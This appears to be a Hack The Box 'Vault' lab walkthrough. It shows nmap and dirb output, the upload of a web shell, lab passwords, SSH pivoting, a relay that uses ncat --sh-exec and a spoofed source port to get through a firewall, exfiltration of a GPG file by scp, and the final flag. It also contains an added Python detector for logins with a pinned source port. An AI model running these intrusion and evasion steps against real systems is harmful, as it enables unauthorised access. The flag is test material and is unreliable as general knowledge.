root@kali:~/HTB/boxes/Vault# nmap -sC -sV -O -A 10.10.10.109
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-03 14:52 MDT
Nmap scan report for 10.10.10.109
Host is up (0.15s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a6:9d:0f:7d:73:75:bb:a8:94:0a:b7:e3:fe:1f:24:f4 (RSA)
|   256 2c:7c:34:eb:3a:eb:04:03:ac:48:28:54:09:74:3d:27 (ECDSA)
|_  256 98:42:5f:ad:87:22:92:6d:72:e6:66:6c:82:c1:09:83 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=11/3%OT=22%CT=1%CU=42739%PV=Y%DS=2%DC=T%G=Y%TM=5BDE0AC
OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=106%TI=Z%CI=I%II=I%TS=A)SEQ
OS:(SP=100%GCD=1%ISR=106%TI=Z%II=I%TS=A)SEQ(SP=100%GCD=1%ISR=106%TI=Z%CI=I%
OS:TS=A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5
OS:=M54DST11NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=
OS:7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 554/tcp)
HOP RTT       ADDRESS
1   193.74 ms 10.10.14.1
2   105.66 ms 10.10.10.109

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.83 seconds
root@kali:~/HTB/boxes/Vault# nmap -sU 10.10.10.109
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-03 15:12 MDT
Nmap scan report for 10.10.10.109
Host is up (0.14s latency).
Not shown: 997 closed ports
PORT     STATE         SERVICE
389/udp  open|filtered ldap
631/udp  open|filtered ipp
5353/udp open|filtered zeroconf
Nmap done: 1 IP address (1 host up) scanned in 1083.23 seconds
root@kali:~/HTB/boxes/Vault# nmap --script=/usr/share/nmap/scripts/ssh2-enum-algos.nse 10.10.10.109
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-03 14:57 MDT
Nmap scan report for 10.10.10.109
Host is up (0.14s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
| ssh2-enum-algos:
|   kex_algorithms: (6)
|       curve25519-sha256@libssh.org
|       ecdh-sha2-nistp256
|       ecdh-sha2-nistp384
|       ecdh-sha2-nistp521
|       diffie-hellman-group-exchange-sha256
|       diffie-hellman-group14-sha1
|   server_host_key_algorithms: (5)
|       ssh-rsa
|       rsa-sha2-512
|       rsa-sha2-256
|       ecdsa-sha2-nistp256
|       ssh-ed25519
|   encryption_algorithms: (6)
|       chacha20-poly1305@openssh.com
|       aes128-ctr
|       aes192-ctr
|       aes256-ctr
|       aes128-gcm@openssh.com
|       aes256-gcm@openssh.com
|   mac_algorithms: (10)
|       umac-64-etm@openssh.com
|       umac-128-etm@openssh.com
|       hmac-sha2-256-etm@openssh.com
|       hmac-sha2-512-etm@openssh.com
|       hmac-sha1-etm@openssh.com
|       umac-64@openssh.com
|       umac-128@openssh.com
|       hmac-sha2-256
|       hmac-sha2-512
|       hmac-sha1
|   compression_algorithms: (2)
|       none
|_      zlib@openssh.com
80/tcp open  http
Nmap done: 1 IP address (1 host up) scanned in 22.26 seconds
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Nov 3 15:05:13 2018
URL_BASE: http://10.10.10.109/sparklays/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.109/sparklays/ ----
+ http://10.10.10.109/sparklays/admin.php (CODE:200|SIZE:615)
==> DIRECTORY: http://10.10.10.109/sparklays/design/
---- Entering directory: http://10.10.10.109/sparklays/design/ ----
==> DIRECTORY: http://10.10.10.109/sparklays/design/uploads/
---- Entering directory: http://10.10.10.109/sparklays/design/uploads/ ----
-----------------
END_TIME: Sat Nov 3 15:36:08 2018
DOWNLOADED: 13836 - FOUND: 1
LOGIN PAGE
http://10.10.10.109/sparklays/admin.php

UPLOAD FILES
http://10.10.10.109/sparklays/design/changelogo.php

UPLOADED p0wny@shell TO GAIN A WEB-BROWSER SHELL AND FOUND THE SSH PASSWORD IN DAVE'S DESKTOP FOLDER
ssh dave@10.10.10.109
Dav3therav3123

FOUND A FILE NAMED "key" THAT CONTAINS
itscominghome

ACCESS THE WEBSITE FROM THE SERVER (SOCKS proxy over SSH)
ssh -D 8080 dave@10.10.10.109

MORE CREDENTIALS FOUND
root@DNS:/var/www/DNS/desktop# cat ssh
dave
dav3gerous567

SSH INTO THE DNS SERVER
ssh dave@192.168.122.4
dav3gerous567

BECOME ROOT
sudo su -
dav3gerous567
TRACEROUTE (using port 1723/tcp)
HOP RTT     ADDRESS
1   0.82 ms 192.168.5.1

Nmap scan report for Vault (192.168.5.2)
Host is up (0.0021s latency).
Not shown: 998 filtered ports
PORT     STATE  SERVICE VERSION
53/tcp   closed domain
4444/tcp closed krb524
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops

TRACEROUTE (using port 53/tcp)
HOP RTT     ADDRESS
1   0.98 ms 192.168.122.5
2   1.86 ms Vault (192.168.5.2)
HOW TO
====================================================================================================
SEE WHAT PORTS ARE OPEN ON VAULT
cat /var/log/auth.log | grep -a 192.168.5.2
(you will see that it uses port 4444 for ssh)

SET UP A LISTENER
ncat -l 5555 --sh-exec "ncat 192.168.5.2 987 --source-port=4444" &

CHECK THAT THE PORT IS OPEN ON VAULT
/usr/bin/nmap 192.168.5.2 -Pn --source-port=4444 -f

SSH IN
ssh dave@localhost -p 5555
ps aux | grep ncat
(if the listener did not start, port 5555 is being used by someone else)
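The steps above only work because the filter in front of Vault trusts packets by their source port (the --source-port=4444 relay). A source port is chosen by the client and is not authentication, so from the defender's side the useful signal is in the sshd log itself: a legitimate client takes a fresh ephemeral port for every connection, whereas a pinned source port repeated across sessions points to exactly this kind of evasion. The following detector is an added example written for this page, not part of the original notes; it parses the real sshd "Accepted ... from <ip> port <port> ssh2" line format, and the log lines, host names, IPs and function names (parse_accepted, fixed_source_port_sessions) are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample auth.log excerpt (not taken from the page). The format is
# the one sshd writes on Ubuntu: "Accepted <method> for <user> from <ip> port <port> ssh2".
SAMPLE_AUTH_LOG = """\
Nov  3 15:40:12 vault sshd[1201]: Accepted password for dave from 192.168.5.1 port 4444 ssh2
Nov  3 15:41:03 vault sshd[1210]: Accepted password for dave from 192.168.5.1 port 4444 ssh2
Nov  3 15:42:30 vault sshd[1222]: Accepted password for dave from 192.168.5.1 port 4444 ssh2
Nov  3 16:02:11 vault sshd[1301]: Accepted publickey for admin from 192.168.5.7 port 51234 ssh2
Nov  3 16:05:44 vault sshd[1309]: Accepted publickey for admin from 192.168.5.7 port 51877 ssh2
Nov  3 16:07:02 vault sshd[1315]: Failed password for root from 192.168.5.1 port 4444 ssh2
"""

# Only successful logins are of interest here; failures are handled by other rules.
ACCEPTED_RE = re.compile(
    r"sshd\[\d+\]: Accepted (?P<method>\S+) for (?P<user>\S+) "
    r"from (?P<src>\S+) port (?P<port>\d+) ssh2"
)

# Linux clients allocate ephemeral ports from 32768 upwards (net.ipv4.ip_local_port_range).
LINUX_EPHEMERAL_START = 32768


def parse_accepted(log_text):
    """Return a list of (user, src_ip, src_port, auth_method) for each successful sshd login."""
    sessions = []
    for line in log_text.splitlines():
        m = ACCEPTED_RE.search(line)
        if m:
            sessions.append((m["user"], m["src"], int(m["port"]), m["method"]))
    return sessions


def fixed_source_port_sessions(log_text, min_sessions=2, ephemeral_start=LINUX_EPHEMERAL_START):
    """Map (src_ip, src_port) -> session count for sources that reuse one
    non-ephemeral client port across several logins.

    A normal client never lands on the same low port repeatedly, so a hit here
    is a strong indicator that the peer is deliberately pinning its source port,
    typically to satisfy a firewall rule that filters on it.
    """
    counts = defaultdict(int)
    for _user, src, port, _method in parse_accepted(log_text):
        counts[(src, port)] += 1
    return {
        key: n for key, n in counts.items()
        if n >= min_sessions and key[1] < ephemeral_start
    }


if __name__ == "__main__":
    for (src, port), n in fixed_source_port_sessions(SAMPLE_AUTH_LOG).items():
        print(f"ALERT: {n} ssh logins from {src} all using client port {port}")
```

Run against a real /var/log/auth.log the same way: read the file into log_text and feed it to fixed_source_port_sessions. The fix on the firewall side is not a better port number but a rule keyed on the peer address (or on an authenticated tunnel), since the client controls its own source port.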
dave@vault:~$ ls
root.txt.gpg

SCP IT BACK TO THE UBUNTU MACHINE (ENSURE NCAT IS WORKING)
root@DNS:~# ncat -l 5555 --sh-exec "ncat 192.168.5.2 987 --source-port=4444" &
[1] 14627

COPY THE FILE FROM VAULT TO DNS USING SCP FROM DNS
root@DNS:~# scp -P 5555 dave@localhost:/home/dave/root.txt.gpg /tmp
dave@localhost's password:
root.txt.gpg                                  100%  629     0.6KB/s   00:00
[1]+  Done                    ncat -l 5555 --sh-exec "ncat 192.168.5.2 987 --source-port=4444"
root@DNS:~# cd /tmp
root@DNS:/tmp# ls
root.txt.gpg  test.txt
Connection to 192.168.122.4 closed.

COPY THE FILE FROM DNS TO UBUNTU, RUN FROM THE UBUNTU MACHINE
dave@ubuntu:~$ scp dave@192.168.122.4:/tmp/root.txt.gpg /dev/shm/
dave@192.168.122.4's password:
root.txt.gpg                                  100%  629     0.6KB/s   00:00
dave@ubuntu:~$ cd /dev/shm
DECRYPT THE GPG ROOT FILE
dave@ubuntu:/dev/shm$ gpg -d root.txt.gpg

You need a passphrase to unlock the secret key for
user: "david <dave@david.com>"
4096-bit RSA key, ID D1EB1F03, created 2018-07-24 (main key ID 0FDFBFE4)

gpg: encrypted with 4096-bit RSA key, ID D1EB1F03, created 2018-07-24
      "david <dave@david.com>"

ROOT FILE
ca468370b91d1f5906e31093d9bfe819